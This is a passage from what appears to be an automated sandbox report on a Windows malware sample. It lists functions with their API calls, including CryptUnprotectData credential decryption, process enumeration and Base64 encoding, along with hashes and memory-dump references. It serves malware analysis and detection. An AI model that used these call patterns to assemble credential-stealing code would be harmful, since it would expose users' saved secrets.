                              • String ID: A{$W?L=$`_q~$~$6{$zDg
                              • API String ID: 0-2886597294
                              • Opcode ID: 47d5d510a60e62fed64c0c9b749c53a9b8bf39d4e4972d0a2828989588c22364
                              • Instruction ID: b069db4de1bb4b02dabd4a6c59fa14e340cc2088463632c3b7b4202f0016b093
                              • Opcode Fuzzy Hash: 47d5d510a60e62fed64c0c9b749c53a9b8bf39d4e4972d0a2828989588c22364
                              • Instruction Fuzzy Hash: 13B24AF36082149FE3046E2DEC8567AFBE5EF94720F16863DEAC4C3744EA3598058697
                              Function 007D2C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 007D2C42
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D2C49
                              • GetTimeZoneInformation.KERNEL32(?), ref: 007D2C58
                              • wsprintfA.USER32 ref: 007D2C83
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID: wwww
                              • API String ID: 3317088062-671953474
                              • Opcode ID: f36d15a4d15dfc227e06e646335e2d5c7a00fb23afb57be8eac94d54e7bd2de7
                              • Instruction ID: c342d26acc43f69a38d3595119ba67807df815b5dbceac596b54e026c0e2dc9f
                              • Opcode Fuzzy Hash: f36d15a4d15dfc227e06e646335e2d5c7a00fb23afb57be8eac94d54e7bd2de7
                              • Instruction Fuzzy Hash: A601F7B1A04644ABCB188B58DC49B6AB779EB84721F00432AF915DB3C0D7741D0086E1
                              Function 007B7750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 007B775E
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007B7765
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007B778D
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 007B77AD
                              • LocalFree.KERNEL32(?), ref: 007B77B7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: f2d54e856d0001ca22f5517ea1f70b910a57b628b0de5e2f225e786e2db7f78f
                              • Instruction ID: e052c62f1434b4ee82d336eb9944b0c35ac33b2701fab7f4f384424a36336703
                              • Opcode Fuzzy Hash: f2d54e856d0001ca22f5517ea1f70b910a57b628b0de5e2f225e786e2db7f78f
                              • Instruction Fuzzy Hash: 45011A75B54308BBEB10DBA49C4AFEA7B7CEB44B11F104155FA09EA2C0DAB0AD00CB90
                              Function 00B664F8 Relevance: 7.5, Strings: 5, Instructions: 1267COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: >YO\$H`6|$V(ff$o"c$k_}
                              • API String ID: 0-707537364
                              • Opcode ID: 036572804f41c479bbea2dcc42f5e12030122fa0e3930b26073387b326251ef3
                              • Instruction ID: fa9b5dc7bf9c25c1b72a13567734baa6dcd17303c1e1205b4c4383dfc8ae0e27
                              • Opcode Fuzzy Hash: 036572804f41c479bbea2dcc42f5e12030122fa0e3930b26073387b326251ef3
                              • Instruction Fuzzy Hash: 3582F3F3A08214AFE3046E2DEC8567AFBE9EF94720F16493DEAC4C3740E63558058697
                              Function 00B5F597 Relevance: 6.6, Strings: 4, Instructions: 1633COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %/_o$1NrN$>)wy$affx
                              • API String ID: 0-3089346042
                              • Opcode ID: 1998ec333a4c2a1073343a5ee2cb2d43638b2292ca2f135c96044c6134680b99
                              • Instruction ID: 9fdb6bfc8c1ce535364d7c213ee3fb6fada1d8cd8c9b7a30114bb97884bb10ed
                              • Opcode Fuzzy Hash: 1998ec333a4c2a1073343a5ee2cb2d43638b2292ca2f135c96044c6134680b99
                              • Instruction Fuzzy Hash: 8BB207F360C2009FE308AE29EC9567ABBE9EFD4320F16493DE6C4C7744EA3558018697
                              Function 00B611D6 Relevance: 6.4, Strings: 4, Instructions: 1398COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ;n%$?>6>$?x$@Q<
                              • API String ID: 0-4018685576
                              • Opcode ID: e001557fb27615d59e628e5c9d2231d684fdac3ccf8187c0b593878d1a3bf600
                              • Instruction ID: ff0f87bb7756ced3b0ed9740f2eb00ce1632db3a50e5afec9305694c422f611a
                              • Opcode Fuzzy Hash: e001557fb27615d59e628e5c9d2231d684fdac3ccf8187c0b593878d1a3bf600
                              • Instruction Fuzzy Hash: 63A2E3F390C2109FE704AE29EC8577ABBE5EF94720F16893DEAC8D3744E63558048697
                              Function 007D3A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007D71FE
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007D3A96
                              • Process32First.KERNEL32(00000000,00000128), ref: 007D3AA9
                              • Process32Next.KERNEL32(00000000,00000128), ref: 007D3ABF
                                • Part of subcall function 007D7310: lstrlen.KERNEL32(------,007B5BEB), ref: 007D731B
                                • Part of subcall function 007D7310: lstrcpy.KERNEL32(00000000), ref: 007D733F
                                • Part of subcall function 007D7310: lstrcat.KERNEL32(?,------), ref: 007D7349
                                • Part of subcall function 007D7280: lstrcpy.KERNEL32(00000000), ref: 007D72AE
                              • CloseHandle.KERNEL32(00000000), ref: 007D3BF7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 6b8586b422c4d4f8d49a829e8d9f7183ebd793a769fbd7fd1cc7778a2874435b
                              • Instruction ID: 00c4be734c19351a63658b14f08620302fe19e2f95ee6505f30ac96a5a98eef9
                              • Opcode Fuzzy Hash: 6b8586b422c4d4f8d49a829e8d9f7183ebd793a769fbd7fd1cc7778a2874435b
                              • Instruction Fuzzy Hash: A4810371919244CFC718CF18D988B95B7F1FB44329F29C1AAD4089B3A2D77A9D82CF91
                              Function 007BEA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 007BEA76
                              • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 007BEA7E
                              • lstrcat.KERNEL32(007DCFEC,007DCFEC), ref: 007BEB27
                              • lstrcat.KERNEL32(007DCFEC,007DCFEC), ref: 007BEB49
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 0bfd833c36da2a70d3e0102a769950993b99213a5dfd9b680888fb9cf44143a8
                              • Instruction ID: 872a4f15c1e57f1ab4d7933cdd85b5ffbe0e20cd6391fa0722c573d9ac9f4783
                              • Opcode Fuzzy Hash: 0bfd833c36da2a70d3e0102a769950993b99213a5dfd9b680888fb9cf44143a8
                              • Instruction Fuzzy Hash: D131E476A14119ABDB10DB98EC85FEFB77EDF84705F0041A9FA09E6240DBB45E04CBA1
                              Function 007D40B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 007D40CD
                              • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 007D40DC
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D40E3
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 007D4113
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptHeapString$AllocateProcess
                              • String ID:
                              • API String ID: 3825993179-0
                              • Opcode ID: fcef8dab2ee6d739183addcae2c7db32dd651e765ce23986e497706aa9bbb378
                              • Instruction ID: e975ef772ad35c991c1ad9a96d061c38c7b531bb85f902f10970fb4a08605748
                              • Opcode Fuzzy Hash: fcef8dab2ee6d739183addcae2c7db32dd651e765ce23986e497706aa9bbb378
                              • Instruction Fuzzy Hash: 78011A70604205BBDB20DFA5DC89BABBBBDEF85311F108199BE0987340DA719D40DBA4
                              Function 007D2B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,007DA3D0,000000FF), ref: 007D2B8F
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 007D2B96
                              • GetLocalTime.KERNEL32(?,?,00000000,007DA3D0,000000FF), ref: 007D2BA2
                              • wsprintfA.USER32 ref: 007D2BCE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: a12a56733253778184eda74f2b6d4a7f7ec3464c49af752b66cf3ccba2bc5624
                              • Instruction ID: 9c0ef4ae69b2d7778792d48653898dca969b71b0092dac30ac22054779cc7c0a
                              • Opcode Fuzzy Hash: a12a56733253778184eda74f2b6d4a7f7ec3464c49af752b66cf3ccba2bc5624
                              • Instruction Fuzzy Hash: D50152B2918168ABCB149BC9DD45FBFB7BCFB4CB12F00011AF605A6280E7785940D7B1
                              Function 007B9B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007B9B3B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 007B9B4A
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007B9B61
                              • LocalFree.KERNEL32 ref: 007B9B70
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
